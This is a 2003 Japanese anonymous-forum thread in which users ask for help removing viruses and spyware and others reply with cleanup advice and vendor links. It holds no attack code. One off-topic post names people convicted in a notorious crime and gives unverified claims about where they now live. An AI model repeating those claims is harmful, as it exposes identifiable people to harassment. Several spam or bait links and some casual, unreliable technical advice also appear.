       ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
        〜oノハヽo〜
  ,.-''"¨ ̄●`' ‐(^▽^)
 (,,●i,,,i,,,,,,,,i,,,,●),,)⊂ )
    )  (    || |   
    ( ^▽^)  (_(__)
~~~~~  ̄ ̄ ~~~~~    ~~~~~

786 :名無しさん@お腹いっぱい。:03/04/09 23:55
http://impress.tv/suidou/try.htm

787 :名無しさん@お腹いっぱい。:03/04/10 00:06
>>778
( ´,_ゝ`)プッ やっぱりネタか?と突っ込みたいところだが
         解せない事が多すぎるので漏れも>>781だね。
         恐らくトレンドに問い合わせても有用な情報は得られないと思われ。以上です。

788 :名無しさん@お腹いっぱい。:03/04/10 00:19
>>787
オンラインスキャンのサポートを求められても放置じゃあ?

>>783
再インストールを戸惑う間は初心者その物。
次からは下記を推奨。

パソコン初心者@2ch掲示板
http://pc2.2ch.net/pcqa/
コンピュータウィルス総合スレッド VOL.28
http://pc2.2ch.net/test/read.cgi/pcqa/1046237849/l50

789 :教えてください:03/04/10 00:32
>784〜788さん
本当にありがとうございました。皆さんのような頼りがいのある、プロの
方々にいろいろアドバイスいただきましてまことに嬉しい限りです。
いささか気持悪さは残りますが、このトレンドの検出ウィルスは放置して
明日から業務にフル回転することにいたしました。今のところ目立ったおかしな
状況は有りませんので、今節は、今の状況で運用していこうと思います。
今後ともよろしくお願いいたします。

790 :黄金泉:03/04/10 08:30
what?

791 :名無しさん@お腹いっぱい。:03/04/10 11:04
どなたか、Xtremeというサイト?の接続ソフトの削除の仕方知らないですか?
ファイルやショートカットを削除しても、PC再起動させるとまた復活
してしまうんです。レジストリでしょうか?
PC重くてしょうがないんです。接続ぶちぶち切られるし・・・


792 :名無しさん@お腹いっぱい。:03/04/10 11:12
>>791
板違い。
ネットワークセキュリティと関係ない。

793 :名無しさん@お腹いっぱい。:03/04/10 11:13
>>791
パソコン初心者@2ch掲示板http://pc2.2ch.net/pcqa/

794 :名無しさん@お腹いっぱい。:03/04/10 11:14
AIソフト、警察庁@policeから違法コピー
http://news2.2ch.net/test/read.cgi/newsplus/1049546428/454

ワラタ

795 :名無しさん@お腹いっぱい。:03/04/10 20:05
age

796 :dennji:03/04/10 20:24
ウイルスを友達に送りたいので送り方教えてください

797 :名無しさん@お腹いっぱい。:03/04/10 20:27
>>796
板違い。板TOP参照。どっかうせろ。

798 :名無しさん@お腹いっぱい。:03/04/10 21:09
KLEZがやってきました。
ウイルススキャンで削除したはずなんですが出勤前で慌てておりまして・・・
本当に削除できているのか感染していないのか確認をしたいのですが
方法はありますでしょうか。
一応スキャンは掛けてみたのですが引っかかりませんでした。
が、しかし添付ファイルフォルダにはなにやら残っている様子。
これは自分の手でゴミ箱へ削除してしまっていいんでしょうか・・・
環境は窓ME IE6 ポスペにて受信です。
どなたかよろしくご教授ください。

799 :cheshire-cat ◆CATBCJABLA :03/04/10 21:10
>>798
アンチウイルスソフトによっては、受信後のメルはスキャンしてくれなかったりするんですが。
そゆ事なんでしょか。
手動で捨ててまって下され。

800 :名無しさん@お腹いっぱい。:03/04/10 21:18
OS2000ですが、
DEVULS_DANCEウイルスを駆除したんです。
ですがHDD容量があまりに少ないので何かと思えば
TempフォルダのGLCファイルが膨大に膨れ上がって
数Gほど取られました。

これはウイルスが原因なんでしょうか?


801 :cheshire-cat ◆CATBCJABLA :03/04/10 21:42
>>800
Devil's Danceは10年以上前のウイルスなんすけど。
それとも違う奴なんでしょか。

tmpとかTempフォルダの中身ってのは、大体は消してしまっても問題無いんすけど。
んでもGCLってのが何なのか知らんので。
消すなら自己責任で、漏れを恨まないで下され。

802 :cheshire-cat ◆CATBCJABLA :03/04/10 21:51
ちなみにこれね。
http://www.nai.com/japan/virusinfo/virDdos.asp?v=Devils_Dance

803 :名無しさん@お腹いっぱい。:03/04/10 21:58
レスありがとうございます。
今の残りHDDが12Mとかって表示されてるので
ファイルごと消すしかなさそうですね。
消してだめでしたらOS再インストール実行してみます。


804 :cheshire-cat ◆CATBCJABLA :03/04/10 22:41
>>803
漏れは確かに、「tmpとかTempフォルダの中身」って書きますた。
フォルダごと消したらダメやん。

805 :名無しさん@お腹いっぱい。:03/04/10 22:50
( ´,_ゝ`)プッ どちらでもいいがTempなんぞ迷わずサッサと捨てろ
         起動のたびに捨ててもいいくらいだ。

806 :798:03/04/10 22:55
>>799 cheshire-cat様
アドバイスどおりに添付ファイルをゴミ箱から削除し
再度ウイルススキャンとオンラインウイルス検索を二重にかけて
感染なしを確認いたしました。
ご教授ありがとうございました。

807 :名無しさん@お腹いっぱい。:03/04/11 00:11
http://www.geocities.jp/mmoussyy/
すいません、これってネタですよね?
このサイトに入ると、うろ覚えなんですが
ディスク削除中とか出ます・・・すぐ消しました。
しかし、次再起動するともう立ち上がらなくなるとか心配です。

808 :名無しさん@お腹いっぱい。:03/04/11 00:15
>>807
ネタだから大丈夫 初心者質問スレやくだ質にもあったなこれ・・・
心配ならオンラインスキャン汁

809 :名無しさん@お腹いっぱい。:03/04/11 00:21
>>808
どうもサンクス。
ウイルスの件は、ウイルスバスター入れてるので大丈夫だと思います。


810 :名無しさん@お腹いっぱい。:03/04/11 02:34
>>807
ウィルスには直接関係ないので、スレ違いかもしれんが、
MicrosoftVMの脆弱性を悪用することで、Web訪問者のHDD初期化も可能だ。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-011.asp

さっさと修正パッチ入れておこう(Windows UpdateでOK)。
パッチを当てないPCを狙ったウィルスが発生するのも時間の問題。


811 :名無しさん@お腹いっぱい。:03/04/11 22:19
パソコン初心者なんで、ウィルスについては何も分らなくて・・・
Norton AntiVirusでスキャンをしたら、感染が一つ見付かりました。
VBS.Network.E というやつです。
削除すればいいのかな?と思い、削除をクリックしたら
「このシステムを永久に削除しますか?」と出ました。
本当に削除しちゃっていいのでしょうか??
感染場所は
C:\Documents and Settings\(自分の名前)\Local Settings\Temporary Internet Files\Content.IE5\HSSJ19O1
となっています。

812 :ぼるじょあ ◆yBEncckFOU :03/04/11 22:26
>>811
(・3・) エェー 削除していいYO

813 :cheshire-cat ◆CATBCJABLA :03/04/11 22:30
>>811
その場所はブラウザのキャッシュなんで、捨ててまってもええはずです。


814 :811:03/04/11 22:39
>>812-813
ありがとうございました!
助かりました(^_^;)

815 :名無しさん@お腹いっぱい。:03/04/11 22:57
ウイルスのMelissa持ってる人、居ます?

816 :名無しさん@お腹いっぱい。:03/04/12 04:36
たつけてくり

817 :名無しさん@お腹いっぱい。:03/04/12 05:56
はじめましてウイルスに感染しました

ウイルス名は「I-worm HAPPY TIME」「トロジャン」です
■症状
・すぐメモリがいっぱいになり再起動を迫られます
 ヘタすると起動して3分くらいで
・起動時に「申し訳ございませんが、gif、jpg、壁紙に対応しておりません」と表示される
 実際、画像ファイルや動画ファイルをクリックするとフリーズする
・普通に終了動作を行ってくれない
 また、コマンドで強制終了しようとしてもしてくれない
 
PCはWin98です
よろしくおねがいします

818 :817:03/04/12 06:32
すいません
質問スレということで、ファイルは削除すればよろしいでしょうか
フリーウエアの駆除ツールとかりましたら教えていただけたらと思います

はじめてウイルスというものに遭遇してどうしてよいのか検討がつきません
なにかアドバイスをください おねがします

819 :cheshire-cat ◆CATBCJABLA :03/04/12 06:46
>>817
セーフモードで起動して処理してくだされ。
電源入れてメーカーのDynaBookだの何だのという画面が表示される直前にCtrlキーを連打。

ウイルスが検出されたHTM、HTML、ASP、VBS、HTTファイルは全て削除。


820 :817:03/04/12 06:51
>>819
ありがとうです
さっそくトライしてみます

821 :名無しさん@お腹いっぱい。:03/04/12 15:48
たった今>>811と同じ症状に、奇遇な!
同じくNorton使っててそれの報告見るとほぼ811の方と同じ場所に入っていたのですが
Nortonのリポート読んでみると「修復できません」「アクセスが拒否されました」とのこと。
とりあえずIEのオプションからテンポラリーファイルの削除を行い、潜伏先のファイルを見
てみたのですが空でした。これでよかったんでしょうか?

822 :名無しさん@お腹いっぱい。:03/04/12 16:32
813 :cheshire-cat ◆CATBCJABLA :03/04/11 22:30
>>811
その場所はブラウザのキャッシュなんで、捨ててまってもええはずです。

「ブラウザのキャッシュ」このくらい自分で調べような?

823 :名無しさん@お腹いっぱい。:03/04/12 18:56
あげます。

824 :817:03/04/13 04:48
結果報告します
先ほど、ウィルスに感染したファイルをすべて削除いたしました
そのあとためしにjpgファイルをクリックしてみましたが無問題でした
いま、再度ウイルス検索かけて最後の確認しています

アドバイスくれた方ありがとうです 感謝

825 :名無しさん@お腹いっぱい。:03/04/13 13:29
削除の仕方教えて下さい。自分の知識ではいっぱいいっぱいです。
繋げっぱなしにしてて朝起きて気づきました。画面右下のスタートアップの
ところにCurrent Connectionなるアイコンが常駐するようになってしまいました。
アイコンの上にカーソルを重ねるとIPアドレスが表示されます。
そして、ネット接続すると、自分のIPアドレスと不明なIPアドレスの2つが
表示されます。
ダブルクリックすると小さなウィンドウが開かれ、
タイトルバーには【Current connection】と表記され、
ウィンドウ内には【No Connections】となっています。
OSはWindoes2000、IE6.0を使っています。ネット環境はADSLです。
アプリでもなくスタートアップにも該当するようなものは何もないです。
トレンドのオンラインスキャン、AVGウイルスチェック、スパイウェアチェック
しましたが、どれも当たりませんでした。
ちなみに、ファイヤーウォールは入れていません。そしてソフトもインストール
した覚えもありません。

826 :名無しさん@お腹いっぱい。:03/04/13 14:07
ファイアーウォール入れろ。
ソフト消せ。

827 :名無しさん@お腹いっぱい。:03/04/13 18:41
This is a humour game
This game is my first work.
You're the first player.
I hope you would like it

828 :名無しさん@お腹いっぱい。:03/04/13 21:25
>>825
http://www21.ann.co.jp/pas/bbs/pslg21545.html#21598

829 :名無しさん@お腹いっぱい。:03/04/13 22:29
age

830 :名無しさん@お腹いっぱい。:03/04/14 00:44
>>828
ほんとにありがとうございました。
そこのサイトは検索しても見つけれませんでした。
そのサイトに書いてあったとおりの現象で本体らしきのものもあったので、
削除できました。あやうくOSインストールしなおすとこでした。
さっそく、ZoneAlarmを入れました。


831 :ぼるじょあ ◆yBEncckFOU :03/04/14 00:55
(・3・) エェー ボクOS再インスコなんて半年に一回はやってるC〜
     たまには再インスコしたほうがいいYO

832 :名無しさん@お腹いっぱい。:03/04/14 01:29
アンチウィルスソフトを2つ以上導入しても大丈夫でしょうか?

・AVG Anti-Virus(常駐する、検知・駆除可、ウィルス定義のアップ遅い)
・BitDefender(常駐しない、検知・駆除可)
・ANTIDOTE SuperLite(常駐しない。というか、こちらはインストール
 せずに毎回圧縮ファイルを解凍して利用するので、ほかのソフトに
 影響を与えない設計らしい。ただし、ウィルス自動駆除はできない)

それぞれフリーなので、機能の欠けている部分を補うように
3つ入れたいのですが、問題あるでしょうか。

833 :名無しさん@お腹いっぱい。:03/04/14 01:32
>>832
多分大丈夫だと思うよ
常駐する物が2つあるのは問題だけど、
非常駐型であればよいと思われ

834 :832:03/04/14 01:38
>>833
ありがとうございました!

835 :名無しさん@お腹いっぱい。:03/04/14 02:00
TREND MICROウィルスバスターOn−lineScanで検索したら
ウィルス名TROJPWSLOGMODB 解除可能 いいえ
ファイルC¥WINDOWS¥syste...と出てしまいました。
どうすれば良いか教えてください。お願いします。

836 :名無しさん@お腹いっぱい。:03/04/14 02:09
絶対に忘れてはならない事件です。
こいつらの犯した残虐な犯行はもはや人間の仕業ではありません。

犯人の氏名
●宮野 裕史(A)
  主犯格。懲役20年の刑で服役中。2008年出所予定。
●小倉 譲(B)
  すでに刑務所から出所。栃木県に潜伏との情報あり(未確認)
氏名、名前を変えている可能性が有ります。
●湊 伸治(C)
  犯行現場の部屋の提供者。すでに刑務所から出所。
千葉県市川市に潜伏との情報あり(未確認)
氏名、名前を変えている可能性が有ります。
●渡邊 泰史(D)
  少年院でいじめに合い、現在引きこもり症候群。
●中村 高次(E)
  宮野、小倉、湊からささいなことでリンチにあう。
現在は地元スナックでこの事件のことを面白おかしく語る無反省人間。
●伊原 真一(?)(F)
  結婚し娘をもうける。出所後、新聞配達員を経て現在は東京近郊の建築会社社員。

★参考サイト★
http://profiler.hoops.ne.jp/concrete.htm
http://www.geocities.co.jp/WallStreet-Bull/1617/
http://topia.yam.com/home/aoiryuyu/pages/josikouseikankin.htm
2000年に放送されたニュースステーションの特集に対する反響
非難
http://www.tv-asahi.co.jp/n-station/yv/bk9920/1130hsg_killer_1.html
http://www.tv-asahi.co.jp/n-station/yv/bk9920/1130hsg_killer_2.html
http://www.tv-asahi.co.jp/n-station/yv/bk9920/1130hsg_killer_3.html


837 :835:03/04/14 02:10
症状としては画面が青っぽくて揺れています。
だんだん酷くなってきて字が読めなくなりそうです。

838 :あぼーん:03/04/14 02:18
   ,.´ / Vヽヽ
    ! i iノノリ)) 〉
    i l l.´ヮ`ノリ <先生!こんなのがありました!
    l く/_只ヽ    
  | ̄ ̄ ̄ ̄ ̄|
ttp://saitama.gasuki.com/sinagawa/

839 :名無しさん@お腹いっぱい。:03/04/14 02:18
>>832
ちなみにBitDefenderは常駐というかサービスが入る。
監視しないくせに、サービス切ったらサーチができない。
ただ、AVGとぶつかる事は無かったと思う。

840 :名無しさん@お腹いっぱい。:03/04/14 02:20
>>837
( ´,_ゝ`)プッ タスクマネージャーを起動してそのプロセスを停止する。
         検出したファイルはすべて削除でいいと思う。
         詳細はトレンドのデータベースにあるだろうから自分で確認しろ

841 :こんにちわ:03/04/14 02:51
すいませんが、ヒントを下さい。GMT.exeと言うアプリケーションが
怪しい動きを見せましたので、アンインストールしたいのですが、削除と追加の
欄に出てきません、どうすれば削除できますか?なんか調べたら、Gator corporation
とかでてきたんですが・・・

842 :835:03/04/14 02:53
>>840
すいません、
Ctrl+Alt+Delでタスクマネージャーを作ろうをクリックすると
IEが消えてしまいます。タスクマネージャーの起動の仕方を教えて下さい。
OSはウィンドウズ98です。お願いします。

843 :名無しさん@お腹いっぱい。:03/04/14 03:02
>>841
( ´,_ゝ`)プッ スパイウエア

844 :名無しさん@お腹いっぱい。:03/04/14 03:06
トレンドマイクロでオンラインスキャンしたら、ウイルス感染ファイル
3つ出てきて、ひとつは駆除可能でそのまま「削除」して、
あとの2つは駆除不可(両方ともPE_NIMDA_A-O)だったけど
削除押したらそれ自体は削除できないけどファイルごと削除することは
できるみたいでファイルごと削除したけどこれで大丈夫でしょうか?

もう1回オンラインスキャンしたら感染ファイルは出てきませんでした。

感染ファイルがないだけで、ウイルス自体は残ってるんで
しょうか?(これが、「ファイル削除」と「ウイルス駆除」の違い?)

どなたか、ご教授ください。

845 :名無しさん@お腹いっぱい。:03/04/14 03:12
>>842
( ´,_ゝ`)プッ Win98ならそのキー同時押しでいい
         スキャンで検出したプログラム名は何かしらんがそれを停止しろ

846 :名無しさん@お腹いっぱい。:03/04/14 03:16
>>844
駆除ってのはファイルからウイルスのみを削除すること
ファイル削除は感染したファイルを丸ごと削除すること
だから、感染したファイルが削除されてしまえばウイルスも消えてしまう

847 :名無しさん@お腹いっぱい。:03/04/14 03:28
>>841
タイピングオブザデッド2003でもインストしたの?
Spybotを使いなさい

848 :名無しさん@お腹いっぱい。:03/04/14 03:35
( ´,_ゝ`)プッ おまいらなぁ・・・検索してやったよ。もう寝る。つまらん
         >>844 http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3169
         >>842 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_PWSLOGMOD.B

849 :844:03/04/14 03:45
>>846
そうなんですか
じゃあ、ウイルスは残ってないとみてよろしいですね。
ウイルス自体は感染ファイルとは別にどっかに残ってて、それが活動して
なんかのファイルを感染させてそのファイルを削除したと思ったので・・
でもスキャンでウイルス自体検出しますよね

ありがとうございました

850 :835:03/04/14 03:49
>>848
本当にありがとうございました。なんとかやってみます。
OSはウィンドウズ98ですた。すみませんでした。

851 :こんにちわ:03/04/14 03:57
>>847
spybotを使ったら、赤い字でバリバリ出てきましたよ。
全部削除しようと思います。ありがとうございました。

852 :こんにちわ:03/04/14 04:02
Gator,DSO exploit,Cydoor,C2.iop,All-in-one telecom,Alexa Related
などなど。何なんでしょうね、こいつらは?

853 :835:03/04/14 04:02
すいません。タスクマネージャーを起動させたくてCtrl+Alt+Delを同時
に押しても「プログラムの強制終了」が出てきてしまい、タスクマネージャー
が起動できません。OSはウィンドウズ98です。タスクマネージャーの起動
のさせ方を教えて下さい。お願いします。

854 :844:03/04/14 04:11
>>848
あ、そのリンク今見ました(^_^;)
「A-O」の場合がそのまま削除で大丈夫で、「A」の場合が「感染」で
いろいろ手順がめんどくさいみたいですね。
全部TemporaryInternetFileだったですけど削除しました。
ありがとうございました



855 :835:03/04/14 07:50
シマンテックでウィルススキャンをかけたらこんなに感染してました。
初心者でして、どうすればいいのか、教えてください。
OSはWin98、IEは6.0SP1です。
よろしくお願いします。
c:\Program Files\katjusha\log\live5.2ch.net\dome\1048742335.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1048726061.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049093562.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049097349.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049103266.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049166699.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049168353.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049168373.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049279151.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\liventv\1049550030.dat は 次のウィルスに感染しています: VBS.LoveLetter.A
c:\Program Files\katjusha\log\live5.2ch.net\livecx\1049034218.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\etc.2ch.net\qa\1049685927.dat は 次のウィルスに感染しています: VBS.LoveLetter.A



856 :名無しさん@お腹いっぱい。:03/04/14 08:25
>>855
( ´,_ゝ`)プッ それは大丈夫だよ。上のは処理したか?リンク先よく嫁
         漏れもう仕事いくけどガンガレよ

857 :835:03/04/14 08:33
>>856
>>848ありがとうございました。
どうしても、タスクマネージャーが出ないんですよね?
Ctrl+Alt+Del同時に押しても「プログラムの強制終了」になってしまう。
なんでだろう?




858 :名無しさん@お腹いっぱい。:03/04/14 11:16
>>857
それでいいんだよ。
「プログラムの強制終了」で常駐しているであろう該当したファイルを停止するんだ。
リストに並んでいる中で、普段存在しないはずの物は無いか?

859 :名無しさん@お腹いっぱい。:03/04/14 11:25
タスクマネージャ――常駐の管理、「プログラムの強制終了」が該当――で
件のファイルの常駐を切るのは、(おそらくは再起動時に)勝手に復元させないためだよ。
この作業で、まず動きを封じてしまうわけだ。

それから>>848の下側のURLに書いてある手順3に移る。

860 :動画直リン:03/04/14 11:45
http://www.agemasukudasai.com/movie/

861 :..:03/04/14 15:58
絶対覗くな危険 VBS,Internal

//www.japan-net.ne.jp/~terada/sukebe/adult.htm

862 :名無しさん@お腹いっぱい。:03/04/14 16:18
http://yahooo.s2.x-beat.com/linkvp/linkvp.html

863 :835:03/04/14 18:35
皆様、お騒がせしてどうもすみません。

>>858
今の「プログラムの強制終了」は
Explorer
Rundll32
Rundll32
Imejpmgr
となっています。普段、見てないので何が怪しいのかわからないんです。

とりあえず、ノートン・インターネットセキュリティー2003体験版
をインストールしてスキャンしたら、大体駆除できたようで、さっき、
トレンドマイクロのオンラインスキャンをかけたら>>835のウィルスは
検出されませんでした。でもノートンのオンラインスキャンをかけると

c:\Program Files\katjusha\log\live5.2ch.net\dome\1048726061.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049097349.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049168353.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049168373.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049279151.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\livecx\1049034218.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\etc.2ch.net\qa\1049685927.dat は 次のウィルスに感染しています: VBS.LoveLetter.A
と出ちゃうんですよね。インターネットセキュリティー体験版では全部駆除
出来てるはずなんですけど。
あと、今も、画面が青っぽくて、揺れています。まだウィルス残ってるんですかね?

864 :名無しさん@お腹いっぱい。:03/04/14 18:56
>>863
>c:\Program Files\katjusha\log\live5.2ch.net\dome\1048726061.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
>c:\Program Files\katjusha\log\live5.2ch.net\dome\1049097349.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
>c:\Program Files\katjusha\log\live5.2ch.net\dome\1049168353.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
>c:\Program Files\katjusha\log\live5.2ch.net\dome\1049168373.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
>c:\Program Files\katjusha\log\live5.2ch.net\dome\1049279151.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
>c:\Program Files\katjusha\log\live5.2ch.net\livecx\1049034218.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
>c:\Program Files\katjusha\log\etc.2ch.net\qa\1049685927.dat は 次のウィルスに感染しています: VBS.LoveLetter.A

まずこれらは安心していい。
そのログ内の紛らわしい書き込みに反応しているだけで、
ログがウィルスに感染しているのではない。
>>1で紹介されているのでURLを辿って把握すべし。


865 :864:03/04/14 18:57
訂正、このスレッドの1ではない。↓

【ノートン】インターネットセキュリティ Ver.21【2003】
http://pc.2ch.net/test/read.cgi/sec/1048433756/1

866 :名無しさん@お腹いっぱい。:03/04/14 19:22
>>863
で、その画面が青みがかり文字がブレるという症状だが、
TROJ_PWSLOGMOD.Bとは無関係だと、まず断言できる。
何故なら>>848の下のURLを参照すれば分かると思うが、
このトロイはパスワードを盗むだけで、
PCのシステムを破壊する性格の物ではないからだ。

Win98(SE?)あるいはハードウェアの設定、ないしはBIOSレベルの問題と思われる。

867 :835:03/04/14 19:50
どうもありがとうございます。
>>864-865
とりあえず、安心しました。ノートンスレ見てみます。
>>866
なるほど、ではウィルスのせいでは無いんでしょうか。
一応SONYカスタマーに電話して設定を少しいじってみたんですが
ダメだったので、やはり、なんらかのウィルスのせいではないか?と。
ノートンで駆除しきれなかったら、初期化するしかないんじゃないか?
とカスタマーの人は言ってました。

868 :名無しさん@お腹いっぱい。:03/04/14 20:21
TROJ_PWSLOGMOD.Bによらないだけで、他のウィルスの可能性は否定しない。
検出できない以上、OSのクリーンインストールがお薦め。
それで解決できないならハードウェアの問題であろう。

どうやらSONYらしいからな…CRTか液晶か知らんが、ソニータイマーの悪寒。
もはやハードウェア板の領域だが、磁場や、赤色の発光不良の調整は行っているだろうか。

869 :名無しさん@お腹いっぱい。:03/04/14 20:27
>>867 えっていうかもうトロージャンは削除できて無問題なんだよね?
それで今はLoveLetter.Aが問題の可能性があるんだよね?
SONYのカスタマーに言われてどこら辺の設定を変えたの?
BIOSに問題があるかもしれないよ。今までアンチウィルス等は
入れてなかったんだよね?それでそれ以前にウィルスに感染して
BIOSにダメージを与えられたのかもしれないし。そのほかにも
なんらかの常駐ソフト同士が干渉して不安定になってるのかもしれない。
漏れの場合は重要なデータは入ってないからまあソフト集めたり
いろいろしてるけどさ。別にフォーマットして困るものないから
すぐにOSアンインスコするけどな。ちなみにBIOSとかハードウェアに
感染してたりするとフォーマットしても感染したりするからね

870 :835:03/04/14 20:45
>>868
レスありがとうございます。
トレンドマイクロのウィルススキャンは検出無しですし、
ノートンのスキャン結果は問題ないようですし、
ノートン・インターネットセキュリティー体験版で駆除してあるし、
ウィルスのせいでは無いようですね。

ちなみに、VAIOのPCGーXR7ってやつです。明日、カスタマーに電話して
ソニータイマー、磁場や発行不良の件、問い合わせてみます。

871 :名無しさん@お腹いっぱい。:03/04/14 20:54
>>870
他はともかく「ソニータイマ」についてだけは問い合わせるな(w

どうにも壊れやすいSONY製品の事を
「新品買い直させる為に意図的にやってんるんじゃいのか」
と揶揄して用いる言葉だから。

872 :835:03/04/14 20:58
>>869
ありがとうございます。カスタマーに言われるがままだったので、
よく解らないんですが、セーフモードでいろいろやりました。
BIOSのことも明日、聞いてみます。
たぶん、液晶モニターだと思うんですが、手でつかんだ時に、液晶にひびが入った?
せいでモニターが故障しているような気もしてきました。
その辺も明日、聞いてみたいと思います。

873 :835:03/04/14 21:03
>>871
なるほど、ソニー製品は壊れやすいんですか。
デスクトップの左上のほうから青みがかってきて、それが全体に広がって
青くなっていった感じなので左上を手でつかんだ時に、液晶を傷つけてしまったのかな?
という気もしてきました。そんなに強くつかんだ覚えはないんですけど。

874 :名無しさん@お腹いっぱい。:03/04/14 23:58
てゆっかVAIOは熱暴走しやすいボードにわざわざAMDのCPU載せる
なんて設計を平気でするからな・・・
と、これ以上は板違い

875 :名無しさん@お腹いっぱい。:03/04/15 09:19
age

876 :名無しさん@お腹いっぱい。:03/04/15 17:29
age

877 :名無しさん@お腹いっぱい。:03/04/16 08:36
age

878 :名無しさん@お腹いっぱい。:03/04/16 11:48
すいませんが BKDR_CLONE.A ってのが検出されたんですが検索しても
どんなものかわからないんですが・・バックドアってことくらいしか・・
これってヤバイものですか?普通に感染しやすいもの??

879 :名無しさん@お腹いっぱい。:03/04/16 11:53
>>878
どうやって(何のウィルス対策製品で)そのウィルスに感染してるとわかったのか?
OSぐらい書けよ。
トレンドマイクロのオンラインスキャンで検出されたのなら、
シマンテックの方もやってみろ。
http://security.symantec.com/ssc/home.asp?j=1&langid=jp&venid=sym&plfid=20&pkj=QBSXIHKERRDTIPOKYJL

880 :878:03/04/16 12:22
>879 
OSは2000 マイクロのウイルススキャンです。あと知り合いの事なんで
詳しいことはよくわかりません。ワームに感染したようだったのでスキャンさせたら
おまけででてきました。

881 :名無しさん@お腹いっぱい。:03/04/16 12:39
ヘッダ見ると全部同じところからの
ウィルスメールが一日平均3〜4通。
セキュリティできちんと対処しているものの、
いいかげんウザいんでプロバに連絡して4/9に調査しますの
回答もらったんですが、
それ以降も状況に変化なし。
もう一回連絡して4/15にやはり調査しますの回答。
しっかり今日もウィルスは来ています。
相手はOCNなんですが、ちゃんと対処してくれるんでしょうか。
OCNとこういうやりとりした経験のある方経緯を教えてください。

また、これでOCNあるいは感染してるらしい人が
対処してくれなかった場合、どんな手段があるでしょうか。

882 :名無しさん@お腹いっぱい。:03/04/16 12:50
>>881
Klez.E、Klez系スレッド part1〜4 参照。
http://pc.2ch.net/sec/kako/1018/10182/1018248786.html
http://pc.2ch.net/sec/kako/1021/10211/1021137509.html
http://pc.2ch.net/sec/kako/1024/10242/1024255721.html
http://pc.2ch.net/test/read.cgi/sec/1030175440/

883 :名無しさん@お腹いっぱい。:03/04/16 16:06
>>881
それで被害が出たなら賠償請求とか。

884 :名無しさん@お腹いっぱい。:03/04/16 20:07
age

885 :bloom:03/04/16 20:15
http://www2.leverage.jp/start/

886 :名無しさん@お腹いっぱい。:03/04/17 08:09
age

887 :山崎渉:03/04/17 12:00
(^^)

888 :名無しさん@お腹いっぱい。:03/04/17 12:39
age

889 :名無しさん@お腹いっぱい。:03/04/17 16:34
age

890 :名無しさん@お腹いっぱい。:03/04/17 16:59
コードレッドに感染したマシンは どこのポートが開くのですか?

891 :名無しさん@お腹いっぱい。:03/04/17 17:07
>>890検索汁
http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html
http://www.symantec.com/region/jp/sarcj/data/c/codered_worm.html

892 :名無しさん@お腹いっぱい。:03/04/18 01:54
オンラインウイルススキャンはトレンドマイクロもシマンテックも試したのですが
反応なし、にもかかわらずMSN Hotmailが勝手にメールを送り、開いた人からまたほかの人にメールを送ってるようです。
これは新種でしょうか?メールは本文はなにもないにもかかわらずサイズが125KBほどありました。

893 :bloom:03/04/18 01:57
http://www2.leverage.jp/start/

894 :名無しさん@お腹いっぱい。:03/04/18 05:12
>>892
MSN Hotmail?
OSぐらいは書かないと誰もレスつけない。

895 :名無しさん@お腹いっぱい。:03/04/18 10:03
age

896 :名無しさん@お腹いっぱい。:03/04/18 12:24
>>894
すみませんOSはXPです。HotmailはMSNのWebメールです。
それが勝手にメールを送りまくってるようなんですがウイルスチェックにひっかかりません。
まったく同じ症状がMeの友達にも出てるようですのでOSは関係ないかと思いました。すみません。

897 :動画直リン:03/04/18 12:27
http://www.agemasukudasai.com/movie/

898 :名無しさん@お腹いっぱい。:03/04/18 12:38
>>896
ウィルススキャンで何もでないのを前提にレスつけると、
OE使っているならOEの設定からHotmailのアカウントは一旦削除してみる。
それでも勝手に送信されるならば、MSN側に何かがある。MSNのサポートへ。

899 :名無しさん@お腹いっぱい。:03/04/18 12:42
>>898
OutlookExpressは使ってないです…
MSN側の問題ですかね??行ってみます。ありがとう。

900 :名無しさん@お腹いっぱい。:03/04/18 15:06
侵入検知システム「Snort」にセキュリティ・ホール,米CERT/CCが警告
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030418/1/
http://www.cert.org/advisories/CA-2003-13.html

901 :名無しさん@お腹いっぱい。:03/04/18 15:27
>>
>>471

902 :名無しさん@お腹いっぱい。:03/04/18 22:44
>>892
